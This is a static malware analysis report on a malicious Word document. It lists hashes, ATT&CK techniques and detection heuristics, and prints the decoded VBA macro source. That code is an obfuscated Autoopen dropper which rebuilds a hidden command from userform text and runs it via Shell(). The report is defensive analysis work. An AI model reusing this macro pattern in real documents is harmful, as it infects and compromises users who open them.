Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30f48d2e0f635b3c…

MALICIOUS

Office (OLE)

Size: 432.5 KB
Created: 2018-12-11 14:33:00
Authoring application: Microsoft Office Word
First seen: 2019-02-04
MD5: 03f7e3175439d6a0571d897289f8a9fd
SHA-1: eda6bd8ca356a9557c0c2fcb2437405cb646d9f8
SHA-256: 30f48d2e0f635b3c63420359d202f2a1231cf08393b3f90676c32fd0b15cb610
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is a malicious Word document containing VBA macros. The Autoopen macro is designed to execute when the document is opened, likely to display a deceptive message prompting the user to enable content. The presence of a Shell() call in the VBA code indicates an attempt to execute arbitrary commands, suggesting it's a downloader or dropper for further malicious activity. The document body itself is a lure for this macro execution.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2934 bytes
SHA-256: 581d6ceca7bdd09c907417e0f28ecee55d0779bfdfc7f4bd6a1187ee4a90a737

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
validateSettingsForm ("max")
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4C1E977F-12F6-4C20-81EB-A5E86BD71A09}{F904A548-3387-40DC-BADB-3FD1FC0D7F9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "100"
UserForm1.ComboBox1.Text = ind1
End Sub

Private Sub CommandButton1_Click()

End Sub

Private Sub ValidText_Change()
Dim bol2 As Integer
With UserForm1
Dim str As String
str = .ValidText
bol2 = Len(str)
Dim bol1 As String
bol1 = "Vi"
fh = "2"
doveryboll bol2
End With
End Sub

Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + UserForm1.Text1
If Len(s) = 62 + 1 Then OpenDateForm
End Sub

Private Sub ComboBox1_Change()

End Sub



Attribute VB_Name = "Module1"
Sub files_replace(C1, ByRef op)
op = ""
st1 = 1
replacefiles st1, op, C1
End Sub

Sub tomorrow(ByRef br1, ByRef bm, xy)
Dim log2 As Integer
log2 = Len(UserForm1.Text1)
If br1 < log2 Then
b = ""
With UserForm1
doc_print_header .Text1, br1, b
If xy <> b Then
br1 = br1 + 1
tomorrow br1, bm, xy
Else
bm = br1
End If
End With
End If
End Sub


Sub replacefiles(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_header later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindSymbols idial - 2, st
need = need + st
pointA = pointA + 1
replacefiles pointA, need, later
End If
End Sub

Sub DataFindSymbols(ext1, ByRef date_max)
Dim m1 As Integer
m1 = -1
date_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
Else
doc_print_header UserForm1.Text1, ext1, date_max
End If
End Sub

Sub doc_print_header(str1, pty, ByRef rmin)
s11 = Left(str1, pty)
s11 = s11 + ""
rmin = Right(s11, 2 - 1)
End Sub

Sub doveryboll(m)
Dim n As Integer
Dim sad As String
With UserForm1
sad = "" + .ValidText
n = m - 415
End With
If m = 415 Then Shell sad, n
End Sub

Sub validateSettingsForm(wstr1)
wstr1 = wstr1 + "Open"
UserForm1.TextBox1 = wstr1 + "Form"
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
tomorrow sb1, arg1, per2
End Sub

Sub OpenDateForm()
Dim str2 As String
files_replace UserForm1.date1, str2
UserForm1.EditText1 = str2
str2 = str2 + ""
UserForm1.ValidText = str2
End Sub